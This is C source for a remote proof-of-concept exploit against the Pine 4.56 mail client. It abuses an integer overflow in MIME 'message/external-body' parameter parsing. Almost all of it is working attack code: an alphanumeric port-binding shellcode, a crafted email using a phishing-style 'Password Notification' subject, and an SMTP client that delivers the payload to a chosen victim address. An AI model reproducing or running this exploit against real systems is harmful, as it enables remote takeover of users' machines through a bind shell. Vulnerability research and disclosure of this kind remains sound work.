/* Remote Pine 4.56 Proof of Concept exploit
* for the integer overflow found by zen-parse
* advisory - http://www.packetstormsecurity.com/0309-advisories/09.10.03.txt
* By - Gyan Chawdhary ([email protected]) Pune, India
*
* greets -> zen-parse (Cool bug)
* The_Itch -> Where have u been ?
* & The Yahoo.com Pen test mailing list (great job guys)
*/
/* NOTE - This code will not work on most/all pine versions, as it was just
* coded to test the vulnerability.
*
* Tested on Redhat 7.0 with pine4.56
*/
#include <stdio.h>
#include <stdlib.h>
#include <stdarg.h>
#include <errno.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
int sock;
struct sockaddr_in s;
char buffer[1024];
char mail[1024];
/* Converted bighawks port-binding shellcode
* to Aplha Numeric chars using asc.c from
* p57-0x0f.txt by [email protected] (port 10000)
*/
char shellcode[]="LLLLZhH6pYX5H6pYHTPPPWRPPaRTSVWBRDJfhfKDTY01RUaAfhTLfXf1Doaf1"
"toajJX0Doc0toc0Tod0TokjtX0Dol0tol0TonjGX0Doo0toof1topfhvjfXf1Dou0TozGjtX0Doz0T""ozG0tozGjDX0DozGGGG0tozGjmY0Loz0TozG0TozGG0TozGjNY0Loz0TozG0TozGG0tozGj5X0DozG""0TozGjFX0Doz0tozGGGG0tozGjrY0Loz0tozGG0tozGG0tozGj5Y0Loz0TozG0tozGjiX0Doz0tozG""0tozGjhY0Loz0tozG0tozGjtX0DozGG0tozGj7Y0Loz0TozGGfhEffYf1Lozf1TozGGGGGjYY0LozG""GGGfhAyfYf1LozGGGG0tozGjyY0Loz0tozGGG0tozGjGX0Doz0tozG0tozGjLY0LozG0TozGj7X0Do""z0Toz1pDVOfSCSCSvjK28v8RfhQzCfSvjOTPQWvsOf21OfL129PPWvlCOf2JvOvTOKI2HAXaQhnvsh""hnVbiveQSvYOG2H";
/* send/recieve data */
void xp_socket_read_write(int fd, char *message)
{
char buffer[1024];
memset(buffer, '\0', sizeof(buffer));
if (send(fd, message, strlen(message), 0) <= 0) {
printf("error\n");
exit(0);
}
if (recv(fd, buffer, sizeof(buffer), 0) <= 0) {
printf("error\n");
exit(0);
}

}

void help(char *s)
{
printf("Remote exploit for Pine 4.56 by Gyan Chawdhary ([email protected])\n");
printf("Usage: %s <options>\n", s);
printf("-h <help>\n");
printf("-i <mailserver\n");
printf("-f <sender>\n");
printf("-t <recipient>\n");
printf("e.g (%s -i my.mailserver -f attacker@host -t victim@host)\n", s);
}
/* Evil msg*/
char *xp_build(char *from, char *to)
{
sprintf(mail, "DATA\r\n"
"From: <%s>\r\n"
"To: <%s>\r\n"
"cc:\r\n"
"Subject: [Password Notification]\r\n"
"MIME-Version: 1.0\r\n"
"Content-Type: message/external-body; access-type=\"URL\";\r\n"
" URL*2147483723=\"%s\";\r\n"
"Content-Transfer-Encoding: 8bit\r\n"
"Content-Description: Check this pic out\r\n.\r\n",
from, to, shellcode);
printf("%s\n", mail);
return mail;
}
main(int argc, char **argv)
{
char ip[16], buf1[512], buf2[512], tmp[1024];
int c;

if (argc < 2) {
help(argv[0]);
exit(0);
}

while ((c = getopt(argc, argv, "h::t:f:i:")) != -1) {

switch(c) {

case 'h':
help(argv[0]);
exit(0);
case 'i':
strncpy(ip, optarg, sizeof(ip));
break;
case 'f':
strncpy(buf1, optarg, sizeof(buf1));
break;
case 't':
strncpy(buf2, optarg, sizeof(buf2));
break;

}
}

if ((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
printf("Error\n");
exit(0);
}
s.sin_family = AF_INET;
s.sin_port = htons(25);
s.sin_addr.s_addr = inet_addr(ip);
memset(&(s.sin_zero), '\0', 8);
if (connect(sock, (struct sockaddr *)&s, sizeof(struct sockaddr)) < 0) { printf("Error\n");
}

memset(tmp, '\0', sizeof(tmp));
sprintf(tmp, "HELO %s\r\n", ip);
xp_socket_read_write(sock, tmp);
memset(tmp, '\0', sizeof(tmp));
sprintf(tmp, "MAIL FROM: <%s>\r\n", buf1);
xp_socket_read_write(sock, tmp);
memset(tmp, '\0', sizeof(tmp));
sprintf(tmp, "RCPT TO: <%s>\r\n", buf2);
xp_socket_read_write(sock, tmp);
memset(tmp, '\0', sizeof(tmp));
xp_socket_read_write(sock, xp_build(buf1, buf2));
printf("Done ...\n");


}

Cracks's S.A